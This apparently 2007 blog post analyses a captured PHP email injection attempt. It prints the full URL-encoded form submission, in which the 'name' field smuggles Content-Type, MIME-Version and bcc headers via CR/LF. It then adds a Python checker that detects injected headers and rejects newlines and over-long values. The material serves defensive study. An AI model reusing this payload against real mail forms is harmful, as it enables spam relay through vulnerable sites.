Thursday, August 09, 2007

Sample PHP Email Injection from a real Attacker

This posting has been in my drafts for over a year. It's really interesting to see how PHP mail injection is done in the wild. Hopefully Michael doesn't mind me posting details - if he does it's not a problem since I'm sure he doesn't read these posts. :)

---------------------------------------------------------------------------

Here is a PHP email injection attempt captured "in the wild". This attack was against the same script that was exploited in PHP Email Injection Step by Step.

The attack wasn't successful for two reasons. First, mod_security was configured to block certain tell-tale signs of PHP email injection (injected mail headers such as Content-Type and bcc following a CR/LF in a form field). Second, the script limits the "name" field to a reasonable length, which this attempt exceeded.

text=stood8261%40spree.mnin.org&
email=stood8261%40spree.mnin.org&
Submit=stood8261%40spree.mnin.org&
name=him%0D%0AContent-Type%3A+multipart%2Fmixed%3B+boundary%3D3cde64db239a99d3c03a2b3399a85a90%0AMIME-Version%3A+1.0%0ASubject%3A+to+himsilf%2C+a+habit+iv+dog%0Abcc%3A+charleses3229%40aol.com%0A%0AThis+is+a+multi-part+message+in+MIME+format.%0A%0A--3cde64db239a99d3c03a2b3399a85a90%0AContent-Type%3A+text%2Fplain%3B+charset%3D%22us-ascii%22%0AMIME-Version%3A+1.0%0AContent-Transfer-Encoding%3A+7bit%0A%0Amay+remember+at+tto+s+visit%0A--3cde64db239a99d3c03a2b3399a85a90--%0A%0D%0A.%0D%0A
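To show what the two defenses above actually catch, here is an added Python example (not code from the original post or from the script it describes) that decodes the captured form submission, flags injected mail headers the way a mod_security rule would, and applies the same kind of newline and length check the script's "name" validation relies on. The 64-character limit, the function names and the header list are assumptions; the post gives no numbers or rule text. The captured query string is the one printed above, joined onto one line.

```python
import re
from urllib.parse import parse_qs

# The captured submission from the post, re-joined onto one line (the attacker's
# payload lives in the "name" field). This is the page's own sample, not new data.
CAPTURED_QUERY = (
    "text=stood8261%40spree.mnin.org&"
    "email=stood8261%40spree.mnin.org&"
    "Submit=stood8261%40spree.mnin.org&"
    "name=him%0D%0AContent-Type%3A+multipart%2Fmixed%3B+boundary%3D3cde64db239a99d3c03a2b3399a85a90"
    "%0AMIME-Version%3A+1.0%0ASubject%3A+to+himsilf%2C+a+habit+iv+dog%0Abcc%3A+charleses3229%40aol.com"
    "%0A%0AThis+is+a+multi-part+message+in+MIME+format.%0A%0A--3cde64db239a99d3c03a2b3399a85a90"
    "%0AContent-Type%3A+text%2Fplain%3B+charset%3D%22us-ascii%22%0AMIME-Version%3A+1.0"
    "%0AContent-Transfer-Encoding%3A+7bit%0A%0Amay+remember+at+tto+s+visit"
    "%0A--3cde64db239a99d3c03a2b3399a85a90--%0A%0D%0A.%0D%0A"
)

# Assumed limit for the "name" field; the post only says the script uses a reasonable one.
MAX_NAME_LEN = 64

# Mail headers that have no business appearing inside a form field. A line that starts
# with one of these is the "tell-tale sign" a mod_security rule would look for.
INJECTED_HEADER_RE = re.compile(
    r"^(bcc|cc|to|content-type|mime-version)\s*:", re.IGNORECASE | re.MULTILINE
)


def decode_form(raw):
    """Decode an application/x-www-form-urlencoded body into {field: first value}."""
    return {k: v[0] for k, v in parse_qs(raw, keep_blank_values=True).items()}


def header_injection_findings(value):
    """Return the lowercase names of injected mail headers found in a field value, in order."""
    return [m.group(1).lower() for m in INJECTED_HEADER_RE.finditer(value)]


def validate_name(value, max_len=MAX_NAME_LEN):
    """Return the reasons a "name" value must be rejected; an empty list means it is acceptable.

    Any CR or LF is rejected outright: a value that is placed in a mail header must never be
    able to start a new header line. The length check is the script's second line of defense.
    """
    reasons = []
    if "\r" in value or "\n" in value:
        reasons.append("newline in header field")
    if len(value) > max_len:
        reasons.append("too long")
    return reasons


def check_submission(raw):
    """Decode a captured form body and report, per field, which injected headers it carries."""
    fields = decode_form(raw)
    return {name: header_injection_findings(value) for name, value in fields.items()
            if header_injection_findings(value)}


if __name__ == "__main__":
    fields = decode_form(CAPTURED_QUERY)
    print("name field rejected because:", validate_name(fields["name"]))
    print("injected headers per field:", check_submission(CAPTURED_QUERY))
```

Run stand-alone it prints the two rejection reasons for the captured "name" value and the list of injected headers (Content-Type, MIME-Version and bcc, with the MIME part's headers repeated), which is exactly the combination the post's two defenses blocked.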
